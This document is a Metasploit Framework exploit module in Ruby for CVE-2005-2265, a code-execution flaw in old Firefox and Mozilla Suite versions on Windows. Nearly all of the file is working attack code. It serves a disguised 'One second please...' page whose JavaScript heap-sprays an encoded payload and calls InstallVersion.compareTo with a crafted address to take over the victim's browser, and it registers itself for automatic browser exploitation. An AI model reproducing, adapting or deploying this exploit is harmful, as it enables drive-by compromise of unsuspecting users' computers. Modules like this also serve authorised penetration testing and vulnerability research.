1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 |
## # $Id: mozilla_compareto.rb 10394 2010-09-20 08:06:27Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking # # This module acts as an HTTP server # include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::BrowserAutopwn # The version for this vuln is tricky because it affects mozilla 1.7-1.7.10 # and firefox 1.0-1.0.4, so we set minver and maxver to the outer bounds. autopwn_info({ :ua_name => HttpClients::FF, :ua_minver => "1.0", :ua_maxver => "1.7.10", :os_name => OperatingSystems::WINDOWS, :javascript => true, :rank => NormalRanking, # reliable memory corruption :vuln_test => "if (typeof InstallVersion != 'undefined') { is_vuln = true; }", }) def initialize(info = {}) super(update_info(info, 'Name' => 'Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution', 'Description'=> %q{ This module exploits a code execution vulnerability in the Mozilla Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit module is a direct port of Aviv Raff's HTML PoC. }, 'License'=> MSF_LICENSE, 'Author' =>['hdm', 'Aviv Raff <avivra [at] gmail.com>'], 'Version'=> '$Revision: 10394 $', 'References' => [ ['CVE','2005-2265'], ['OSVDB','17968'], ['BID','14242'], ['URL','http://www.mozilla.org/security/announce/mfsa2005-50.html'], ], 'Payload'=> { 'Space'=> 400, 'BadChars' => "\x00", }, 'Targets'=> [ # Tested against Firefox 1.0.4 and Mozilla 1.7.1 on # WinXP-SP3 and Win2kAS-SP0 [ 'Firefox < 1.0.5, Mozilla < 1.7.10, Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86, 'Ret' => 0x0c0c0c0c, } ], ], 'DefaultTarget'=> 0, 'DisclosureDate' => 'Jul 13 2005' )) end def on_request_uri(cli, request) # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' }) # Handle the payload handler(cli) end def generate_html(payload) enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) enc_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch)) spray_to = sprintf("0x%.8x", target.ret) spray_slide1 = Rex::Text.to_unescape( [target.ret].pack('V'), Rex::Arch.endian(target.arch) ) spray_slide2 = Rex::Text.to_unescape( [target.ret].pack('V'), Rex::Arch.endian(target.arch) ) eax_address = sprintf("0x%.8x", target.ret) return %Q| <html> <head> <!-- Copyright (C) 2005-2006 Aviv Raff (with minor modifications by HDM for the MSF module) From: http://aviv.raffon.net/2005/12/11/MozillaUnderestimateVulnerabilityYetAgainPlusOldVulnerabilityNewExploit.aspx Greets: SkyLined, The Insider and shutdown --> <title>One second please...</title> <script language="javascript"> function BodyOnLoad() { location.href="javascript:void (new InstallVersion());"; CrashAndBurn(); }; #{js_heap_spray} // The "Heap Spraying" is based on SkyLined InternetExploiter2 methodology function CrashAndBurn() { // Payload - Just return.. var payLoadCode=unescape("#{enc_code}"); // Size of the heap blocks var heapBlockSize=0x400000; sprayHeap(payLoadCode, #{target.ret}, heapBlockSize - (payLoadCode.length + 0x38)); // Set address to fake "pdata". var eaxAddress = #{eax_address}; // This was taken from shutdown's PoC in bugzilla // struct vtbl { void (*code)(void); }; // struct data { struct vtbl *pvtbl; }; // // struct data *pdata = (struct data *)(xxAddress & ~0x01); // pdata->pvtbl->code(pdata); // (new InstallVersion).compareTo(new Number(eaxAddress >> 1)); } // --> </script> </head> <body onload="BodyOnLoad()"> </body> </html> | end end |